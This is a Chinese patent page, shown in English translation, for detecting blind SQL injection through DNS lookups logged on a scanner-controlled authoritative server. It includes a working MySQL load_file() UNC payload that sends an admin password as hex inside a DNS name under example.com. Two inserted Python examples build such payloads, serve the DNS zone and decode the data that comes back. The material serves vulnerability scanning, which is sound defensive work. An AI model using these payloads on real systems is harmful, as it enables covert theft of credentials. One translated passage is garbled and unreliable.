CN109347805B - DNS-based echoless SQL injection detection method - Google Patents


Info

Publication number
CN109347805B
Authority
CN
China
Prior art keywords
dns server
dns
sql injection
request
detection
Prior art date
Legal status
Active
Application number
CN201811096610.0A
Other languages
Chinese (zh)
Other versions
CN109347805A (en)
Inventor
应臣伟
范渊
Current Assignee
Hangzhou Dbappsecurity Technology Co Ltd
Original Assignee
Hangzhou Dbappsecurity Technology Co Ltd
Priority date
Filing date
Publication date
Application filed by Hangzhou Dbappsecurity Technology Co Ltd
Priority to CN201811096610.0A
Publication of CN109347805A
Application granted
Publication of CN109347805B
Legal status: Active

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L 63/00 Network architectures or network communication protocols for network security
    • H04L 63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L 63/1433 Vulnerability analysis
    • H04L 61/00 Network arrangements, protocols or services for addressing or naming
    • H04L 61/45 Network directories; Name-to-address mapping
    • H04L 61/4505 Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols
    • H04L 61/4511 Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols using domain name system [DNS]
    • H04L 67/00 Network arrangements or protocols for supporting network services or applications
    • H04L 67/01 Protocols
    • H04L 67/02 Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]

Landscapes

  • Engineering & Computer Science
  • Computer Networks & Wireless Communication
  • Signal Processing
  • Computer Security & Cryptography
  • Computer Hardware Design
  • Computing Systems
  • General Engineering & Computer Science
  • Data Exchanges In Wide-Area Networks

Abstract

The invention relates to a DNS-based no-echo SQL injection detection method. An SQL injection scanner sends an HTTP request carrying a detection payload to the target website; when the payload is executed by the database it triggers a DNS request to an authoritative DNS server under the scanner's control; the authoritative DNS server resolves the request, returns a response towards the target website and records the resolution in its log; when the scanner later sends an HTTP query to the authoritative DNS server asking for matching resolution records, the log is searched, and the presence or absence of a matching record is the detection result for whether the website has an SQL injection vulnerability. The invention uses DNS resolution records with a specially encoded name format to detect SQL injection without echo, which makes detection of the vulnerability accurate and fast, reduces detection time, improves the scanner's efficiency and avoids both missed reports and false reports.

Description

DNS-based echoless SQL injection detection method
Technical Field
The invention relates to the technical field of security measures for protecting computers, their components, programs or data against unauthorised activity, and in particular to a DNS-based no-echo SQL injection detection method that detects SQL injection vulnerabilities quickly and effectively while reducing a scanner's false-report and missed-report rates.
Background
SQL is a standard language for accessing and manipulating database systems; SQL statements retrieve and update data in a database. SQL is used together with database programs and is supported by systems such as Microsoft Access, DB2, Informix, Microsoft SQL Server, Oracle and Sybase.
However, because developers build SQL statements carelessly, SQL injection vulnerabilities are widespread. In short, an SQL injection vulnerability arises when attacker-controlled input is concatenated into a query and a poorly designed program neglects to validate it: the injected fragment is taken by the database server for a legitimate SQL instruction and executed, so the system is damaged or compromised.
In the prior art, SQL injection detection is one of the standard checks. By the type of detection payload, the methods include Boolean-based blind injection, time-based blind injection, error-based SQL injection, union-based SQL injection and others. Boolean-based, error-based and union-based detection are normally used for SQL injection vulnerabilities with echo (the effect of the query is visible in the response), while time-based blind injection is normally used for SQL injection vulnerabilities without echo.
Boolean-based, error-based and union-based methods send different detection payloads, obtain different HTTP response packets, and decide whether a vulnerability exists by analysing the returned pages. For an SQL injection vulnerability without echo, request packets carrying different payloads produce identical response packets, page analysis concludes that no SQL vulnerability exists, and the vulnerability is not reported (a missed report).
The time-based blind injection method sends detection payloads that make the target website delay its response, the delay being determined by the payload, and decides whether an SQL vulnerability exists from the difference in response times; it can therefore be used for SQL injection vulnerabilities without echo. In practice, however, uncontrollable factors such as network quality add unrelated delay to HTTP packets in transit, and time-based blind injection easily produces large numbers of false reports when used to detect no-echo SQL injection vulnerabilities.
Disclosure of Invention
To solve these problems of the prior art, the invention provides an optimised DNS-based no-echo SQL injection detection method.
The technical scheme adopted by the invention is a DNS-based no-echo SQL injection detection method comprising the following steps:
Step 1: the SQL injection scanner sends an HTTP request carrying a detection payload to the target website;
Step 2: the detection payload passes through the target website into the database server; the detection code in the payload is executed by the database and initiates a DNS request for a name served by the authoritative DNS server;
Step 3: the authoritative DNS server resolves the DNS request, returns a response towards the target website, and records the resolution result in a log;
Step 4: determine whether the SQL injection scanner has sent a resolution-record query request to the authoritative DNS server over HTTP; if so, proceed to the next step, otherwise return to step 1;
Step 5: the authoritative DNS server answers the scanner's query request by searching the log; if a matching resolution record exists, the website has an SQL injection vulnerability, otherwise it does not, and the SQL injection detection result is returned.
Preferably, in step 2, the DNS request contains a special string that the SQL injection scanner uses to detect the SQL vulnerability.
Preferably, in step 3, the resolution of the DNS request by the authoritative DNS server comprises the following steps:
Step 3.1: the DNS request reaches the default (recursive) DNS server;
Step 3.2: the default DNS server cannot answer the request itself and sends a query to its parent DNS server;
Step 3.3: the parent DNS server derives the address of the authoritative DNS server from the DNS request;
Step 3.4: the parent DNS server returns the address of the authoritative DNS server to the default DNS server;
Step 3.5: the default DNS server sends the DNS query again, this time to the authoritative DNS server at that address;
Step 3.6: the authoritative DNS server resolves the DNS request and returns the correct IP address to the default DNS server, completing resolution of the DNS request.
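Step 3.6 is where the authoritative DNS server sees the probe name and has to both answer it and record it. The following added example (not the patent's implementation) is a minimal authoritative responder for that step: it parses the query the default DNS server sends in step 3.5, writes the resolution record that step 5 later searches, and answers every A query under the zone with one fixed address at TTL 0. The zone example.com and the address 198.51.100.1 are assumptions, the log line format is assumed, and the query packet is constructed inside the block as test input rather than captured from a resolver.

```python
"""Authoritative-server side of step 3: parse the DNS query that finally arrives
from the default (recursive) resolver, write the resolution record step 5 will
search, and answer every name under the zone.  Added example, not the patent's
implementation; the zone, answer address and log line format are assumptions.
Plain RFC 1035 wire format; no name compression is expected in a question."""
import struct

ZONE = "example.com"         # zone delegated to this server (assumed)
ANSWER_IP = "198.51.100.1"   # address returned for every probe name (assumed)
QTYPE_A = 1
QTYPE_NAMES = {1: "A", 28: "AAAA", 16: "TXT"}


def encode_name(name: str) -> bytes:
    """Text name -> label sequence, enforcing the 63-octet label limit."""
    out = b""
    for label in name.rstrip(".").split("."):
        raw = label.encode("ascii")
        if not 1 <= len(raw) <= 63:
            raise ValueError(f"bad label length: {label!r}")
        out += bytes([len(raw)]) + raw
    return out + b"\x00"


def decode_name(msg: bytes, offset: int):
    """Label sequence at offset -> (text name, offset just past the root label)."""
    labels = []
    while True:
        length = msg[offset]
        if length == 0:
            return ".".join(labels), offset + 1
        if length & 0xC0:
            raise ValueError("compression pointer in question name")
        offset += 1
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length


def build_query(name: str, qtype: int = QTYPE_A, txid: int = 0x1234) -> bytes:
    """What the default DNS server sends in step 3.5 (constructed test input;
    flags 0x0100 = recursion desired)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(msg: bytes) -> dict:
    """Step 3.6, first half: pull id, QNAME and QTYPE out of the question section.
    A query has QR clear and exactly one question; anything else is rejected."""
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question query")
    qname, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    return {"id": txid, "flags": flags, "qname": qname, "qtype": qtype,
            "qclass": qclass, "qend": off + 4}


def in_zone(qname: str, zone: str = ZONE) -> bool:
    """Case-insensitive 'is this name at or below the zone apex'."""
    q = qname.lower().rstrip(".")
    return q == zone or q.endswith("." + zone)


def log_record(src_ip: str, src_port: int, q: dict) -> str:
    """The resolution record of step 3.  Every in-zone query is logged as seen,
    marker or not; matching the marker is the scanner's job in step 5."""
    qtype = QTYPE_NAMES.get(q["qtype"], str(q["qtype"]))
    return f"client {src_ip}#{src_port}: query: {q['qname']} IN {qtype}"


def build_response(msg: bytes, q: dict, ip: str = ANSWER_IP, ttl: int = 0) -> bytes:
    """Step 3.6, second half.  Any A query under the zone gets the fixed address
    with TTL 0, so resolvers do not cache the probe name and a repeated probe
    still reaches this server and is logged.  Names outside the zone get REFUSED."""
    question = msg[12:q["qend"]]
    rd = q["flags"] & 0x0100                      # echo the RD bit
    if not in_zone(q["qname"]):
        return struct.pack("!HHHHHH", q["id"], 0x8005 | rd, 1, 0, 0, 0) + question
    if q["qtype"] != QTYPE_A:                     # authoritative, empty NOERROR
        return struct.pack("!HHHHHH", q["id"], 0x8400 | rd, 1, 0, 0, 0) + question
    rdata = bytes(int(octet) for octet in ip.split("."))
    # name field 0xC00C = pointer to the question name at offset 12
    answer = struct.pack("!HHHIH", 0xC00C, QTYPE_A, 1, ttl, 4) + rdata
    return struct.pack("!HHHHHH", q["id"], 0x8400 | rd, 1, 1, 0, 0) + question + answer


if __name__ == "__main__":
    query = build_query("dns_sqli_a1b2c3d4.example.com")
    parsed = parse_query(query)
    print(log_record("203.0.113.5", 51234, parsed))
    print(build_response(query, parsed).hex())
```

Two choices in this block matter for detection reliability. The record is written for every in-zone name rather than only for names carrying the marker, so the scanner's matching rule can change without touching the server. And the answer carries TTL 0: if the default DNS server cached the probe name, a second probe for the same name would be answered from cache and never reach the authoritative server, so it would never be logged.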
The invention provides an optimised DNS-based no-echo SQL injection detection method. An SQL injection scanner sends an HTTP request carrying a detection payload to the target website; when the payload is executed it triggers a DNS request to the authoritative DNS server; the authoritative DNS server resolves the request, returns a response towards the target website and records the resolution result in a log; when the scanner sends an HTTP query to the authoritative DNS server for matching resolution records, the log is searched and the presence or absence of a record gives the detection result for whether the website has an SQL injection vulnerability. Using DNS resolution records with a specially encoded name format to detect no-echo SQL injection avoids the missed reports that Boolean-based, error-based and union-based detection produce on such vulnerabilities and the false reports that time-based blind injection produces; detection is accurate and fast, detection time is reduced, scanner efficiency improves, and both missed reports and false reports are prevented.
Drawings
FIG. 1 is a flow chart of the present invention.
Detailed Description
The present invention is described in further detail with reference to the following examples, but the scope of the present invention is not limited thereto.
The invention relates to a DNS-based no-echo SQL injection detection method. DNS is an Internet service that acts as a distributed database mapping domain names and IP addresses to each other so that people can reach the Internet more conveniently; the conversion between a domain name and an IP address is obtained through DNS resolution, which is performed by DNS servers.
Taking example.com as a domain name resolved by an authoritative DNS server whose log the scanner can query, and a target website to be checked for an SQL injection vulnerability, the method comprises the following steps.
Step 1: the SQL injection scanner sends an HTTP request with the detection payload to the target website.
In the invention, an example HTTP request is (shown unencoded for readability):
http://example.com/sqli.php?id=1 union select 1,2,load_file(CONCAT('\\\\dns_sqli_',(SELECT hex(pass) FROM test.test_user WHERE name='admin' LIMIT 1),'.example.com\\abc'))
The four leading backslashes are MySQL string-literal escaping for the two backslashes that open a UNC path, and the trailing \\abc is the escaped share name \abc. The payload makes the database (MySQL on Windows) call load_file() on a UNC path whose host part is dns_sqli_<hex of the admin password>.example.com; the host has to be resolved before any file can be fetched, and that resolution is the DNS request of step 2.
step 2: and the detection load enters the database server through the target website, and the detection code in the detection load is executed by the database and initiates a DNS request aiming at the authoritative DNS server.
In the step 2, the DNS request includes a special character string for detecting an SQL vulnerability in the SQL injection scanner.
In the invention, the DNS request aiming at the authoritative DNS server comprises the following steps: dns _ sqli _ permitted.example.com; a special string such as dns _ sqli _ password.
Step 3: the authoritative DNS server resolves the DNS request, returns a response towards the target website, and records the resolution result in a log.
In step 3, the resolution of the DNS request by the authoritative DNS server comprises the following steps:
Step 3.1: the DNS request reaches the default (recursive) DNS server;
Step 3.2: the default DNS server cannot answer the request itself and sends a query to its parent DNS server;
Step 3.3: the parent DNS server derives the address of the authoritative DNS server from the DNS request;
Step 3.4: the parent DNS server returns the address of the authoritative DNS server to the default DNS server;
Step 3.5: the default DNS server sends the DNS query again, this time to the authoritative DNS server at that address;
Step 3.6: the authoritative DNS server resolves the DNS request and returns the correct IP address to the default DNS server, completing resolution of the DNS request.
In the invention, suppose the DNS request is for test.example.com. The parent DNS server is not the resolving server for example.com, so it cannot answer for test.example.com, but it can see that test.example.com is a subdomain of example.com and it knows the address of the authoritative DNS server for example.com. It therefore returns that address to the default DNS server, the default DNS server re-issues the query for test.example.com to the authoritative DNS server, and the authoritative DNS server resolves the request and returns the correct IP address of test.example.com to the default DNS server.
Step 4: determine whether the SQL injection scanner has sent a resolution-record query request to the authoritative DNS server over HTTP; if so, proceed to the next step, otherwise return to step 1.
In the invention, the query request asks the authoritative DNS server whether its log contains any request whose name contains the string dns_sqli_. Because this matches only the shared marker, a scanner that sends many probes should also put a per-request identifier in the name so that a hit can be tied to the request and target that produced it.
Step 5: the authoritative DNS server answers the scanner's query request by searching the log; if a matching resolution record exists, the website has an SQL injection vulnerability, otherwise it does not, and the SQL injection detection result is returned.
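Steps 1, 2, 4 and 5 above (and the same steps in the Disclosure section) describe the scanner's side: build the payload, send it, and later ask the authoritative server's log for a matching record. The following added example, which is not the patent's code, does that end to end offline in Python: it builds the page's MySQL load_file() payload for the URL http://example.com/sqli.php and parameter id from the request example, and runs the step 5 check over a few constructed BIND-style log lines. It goes one step beyond the page by putting a random per-probe token after the dns_sqli_ marker and by enforcing the DNS label and name length limits; the log line format, the token scheme and the sample log lines are assumptions.

```python
"""Scanner side of the page's DNS-based no-echo SQL injection check (steps 1, 2, 4
and 5).  Added example, not the patent's code: the target URL and parameter, the
zone, the query-log format and the sample log lines are assumptions."""
import re
import secrets
from urllib.parse import quote

MARKER = "dns_sqli_"    # the page's "special string": prefix of every probe name
ZONE = "example.com"    # zone whose authoritative server the scanner runs (assumed)
MAX_LABEL = 63          # RFC 1035: one label is at most 63 octets,
MAX_NAME = 253          # a whole name at most 253 characters in text form


def mint_token(nbytes=4):
    """Random per-probe token: ties a log hit to one request, so a stale hit
    from an earlier scan or another target is not reported against this one."""
    return secrets.token_hex(nbytes)


def build_probe_name(token, marker=MARKER, zone=ZONE):
    """<marker><token>.<zone>, checked against the DNS length limits."""
    label = marker + token
    if len(label) > MAX_LABEL:
        raise ValueError(f"label {label!r} longer than {MAX_LABEL} octets")
    name = f"{label}.{zone}"
    if len(name) > MAX_NAME:
        raise ValueError(f"name {name!r} longer than {MAX_NAME} characters")
    return name


def build_mysql_payload(token, hex_expr=None, zone=ZONE):
    """Step 1 payload in the page's MySQL-on-Windows form: load_file() on a UNC
    path whose host is the probe name; the host is resolved before any file
    access, so the lookup reaches the authoritative server although the share
    never exists.  Four backslashes in the SQL literal are two after MySQL
    unescaping (the \\\\host\\share prefix).  hex_expr, if given, is inserted as
    one extra label and must yield at most 63 hex chars, e.g.
    SUBSTRING(HEX(pass),1,60); a bare hex(pass) overflows past 31 bytes."""
    name = build_probe_name(token, zone=zone)
    label, _, rest = name.partition(".")
    if hex_expr is None:
        return rf"1 union select 1,2,load_file('\\\\{name}\\abc')"
    return (rf"1 union select 1,2,load_file(CONCAT('\\\\{label}.',{hex_expr},"
            rf"'.{rest}\\abc'))")


def build_probe_url(base_url, param, payload):
    """The HTTP request of step 1 (URL and parameter name as on the page)."""
    return f"{base_url}?{param}={quote(payload, safe='')}"


# Assumed BIND-style query-log line written by the authoritative server.
QUERY_LOG_RE = re.compile(
    r"client (?P<src>[0-9a-f.:]+)#\d+.*?query: (?P<qname>\S+) IN (?P<qtype>\w+)")


def find_probe_hits(log_lines, marker=MARKER, zone=ZONE):
    """Step 5: search the resolution log for names under the zone whose first
    label carries the marker.  Returns {token: [(resolver_ip, extra_labels)]}.
    Names are lowercased first because resolvers may randomise query-name case."""
    hits = {}
    suffix = "." + zone.lower()
    for line in log_lines:
        m = QUERY_LOG_RE.search(line)
        if not m:
            continue
        qname = m.group("qname").lower().rstrip(".")
        if not qname.endswith(suffix):
            continue
        labels = qname[:-len(suffix)].split(".")
        if not labels[0].startswith(marker):
            continue
        token = labels[0][len(marker):]
        hits.setdefault(token, []).append((m.group("src"), labels[1:]))
    return hits


def decode_hex_labels(labels):
    """Recover data carried in the extra labels (the page's hex(pass) variant)."""
    return bytes.fromhex("".join(labels)).decode("utf-8", "replace")


# Constructed sample of the authoritative server's log: two hits for one probe
# (one in randomised case, one carrying exfiltrated data) and an unrelated lookup.
SAMPLE_LOG = [
    "19-Sep-2018 10:12:33.001 client 203.0.113.5#51234: query: DNS_SQLI_a1b2c3d4.example.com IN A + (198.51.100.1)",
    "19-Sep-2018 10:12:33.050 client 203.0.113.5#51235: query: dns_sqli_a1b2c3d4.61646d696e.example.com IN A + (198.51.100.1)",
    "19-Sep-2018 10:12:40.777 client 198.51.100.9#4242: query: www.example.com IN AAAA + (198.51.100.1)",
]

if __name__ == "__main__":
    token = "a1b2c3d4"    # a real scan would use mint_token()
    print(build_probe_url("http://example.com/sqli.php", "id",
                          build_mysql_payload(token, "SUBSTRING(HEX(pass),1,60)")))
    hits = find_probe_hits(SAMPLE_LOG)   # the step 5 verdict is "token in hits"
    print("vulnerable:", token in hits)
    for _src, extra in hits.get(token, []):
        if extra:
            print("data carried in the name:", decode_hex_labels(extra))
```

Running the block prints the probe URL and the verdict for the sample log. Matching only the shared marker, as step 5 on the page does, cannot say which request produced a hit once a scanner sends many probes; the token after the marker makes each record attributable to one request, and the length checks catch the case where an encoded value no longer fits a label.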
In summary, the scanner sends an HTTP request carrying a detection payload, execution of the payload triggers a DNS request to the authoritative DNS server, the server resolves it and records the resolution, and the scanner then queries that log over HTTP: a matching record means the website has a no-echo SQL injection vulnerability. Because the signal is a DNS resolution record in a specially encoded name format rather than a page difference or a timing difference, the method avoids the missed reports of Boolean-based, error-based and union-based detection and the false reports of time-based blind injection, shortens detection time and improves scanner efficiency.

Claims (2)

1. A DNS-based no-echo SQL injection detection method, characterised in that it comprises the following steps:
Step 1: the SQL injection scanner sends an HTTP request carrying a detection payload to the target website;
Step 2: the detection payload passes through the target website into the database server; the detection code in the payload is executed by the database and initiates a DNS request for a name served by the authoritative DNS server;
Step 3: the authoritative DNS server resolves the DNS request and returns a response towards the target website, comprising the following steps:
Step 3.1: the DNS request reaches the default DNS server;
Step 3.2: the default DNS server cannot answer the request itself and sends a query to its parent DNS server;
Step 3.3: the parent DNS server derives the address of the authoritative DNS server from the DNS request;
Step 3.4: the parent DNS server returns the address of the authoritative DNS server to the default DNS server;
Step 3.5: the default DNS server sends the DNS query again, this time to the authoritative DNS server at that address;
Step 3.6: the authoritative DNS server resolves the DNS request and returns the correct IP address to the default DNS server, completing resolution of the DNS request;
and the resolution result is recorded in a log;
Step 4: determine whether the SQL injection scanner has sent a resolution-record query request to the authoritative DNS server over HTTP; if so, proceed to the next step, otherwise return to step 1;
Step 5: the authoritative DNS server answers the scanner's query request by searching the log; if a matching resolution record exists, the website has an SQL injection vulnerability, otherwise it does not, and the SQL injection detection result is returned.
2. The DNS-based no-echo SQL injection detection method according to claim 1, characterised in that in step 2 the DNS request contains a special string that the SQL injection scanner uses to detect the SQL vulnerability.
CN201811096610.0A, priority date 2018-09-19, filing date 2018-09-19: DNS-based echoless SQL injection detection method. Status: Active. Granted as CN109347805B (en).

Priority Applications (1)

Application Number Priority Date Filing Date Title
CN201811096610.0A CN109347805B (en) 2018-09-19 2018-09-19 DNS-based echoless SQL injection detection method

Publications (2)

Publication Number Publication Date
CN109347805A CN109347805A (en) 2019-02-15
CN109347805B (en) 2021-06-15

Family

ID=65305552

Families Citing this family (7)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN111953638B (en) * 2019-05-17 2023-06-27 北京京东尚科信息技术有限公司 Network attack behavior detection method and device and readable storage medium
CN111600885A (en) * 2020-05-15 2020-08-28 北京铭图天成信息技术有限公司 SQL injection vulnerability detection method and device, equipment and storage medium
CN111597559B (en) * 2020-05-15 2023-10-13 北京铭图天成信息技术有限公司 System command injection vulnerability detection method and device, equipment and storage medium
CN114157452B (en) * 2021-11-12 2024-07-23 湖北天融信网络安全技术有限公司 Method and system for detecting XXE vulnerabilities based on an HTTP connection platform
CN114143047A (en) * 2021-11-17 2022-03-04 湖北天融信网络安全技术有限公司 Vulnerability detection method and device, terminal equipment, Web server and storage medium
CN113987521B (en) * 2021-12-28 2022-03-22 北京安华金和科技有限公司 Scanning and processing method and device for database vulnerabilities
CN114826743A (en) * 2022-04-27 2022-07-29 湖北天融信网络安全技术有限公司 Vulnerability detection method, device, equipment and medium

Citations (4)

Publication number Priority date Publication date Assignee Title
CN105631341A (en) * 2015-12-18 2016-06-01 北京奇虎科技有限公司 Blind test method and device of bug
CN106612339A (en) * 2015-10-27 2017-05-03 中国电信股份有限公司 Domain name updating method, system and main DNS (Domain Name System) server
CN106790195A (en) * 2016-12-30 2017-05-31 北京神州绿盟信息安全科技股份有限公司 SQL injection detection method and device
CN108509792A (en) * 2017-02-23 2018-09-07 腾讯科技(深圳)有限公司 Injection vulnerability detection method and device

Family Cites Families (2)

Publication number Priority date Publication date Assignee Title
US7657540B1 (en) * 2003-02-04 2010-02-02 Seisint, Inc. Method and system for linking and delinking data records
CN102136051B (en) * 2011-05-06 2013-02-20 南开大学 Method for driving web application penetration testing by applying SGM-SQL (sage grant management-structured query language) injection model

Non-Patent Citations (1)

Title
Afant1, "Making clever use of DNSlog to achieve no-echo injection", https://www.cnblogs.com/afanti/p/8047530.html, 2017-12-16, pp. 1-4 *

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant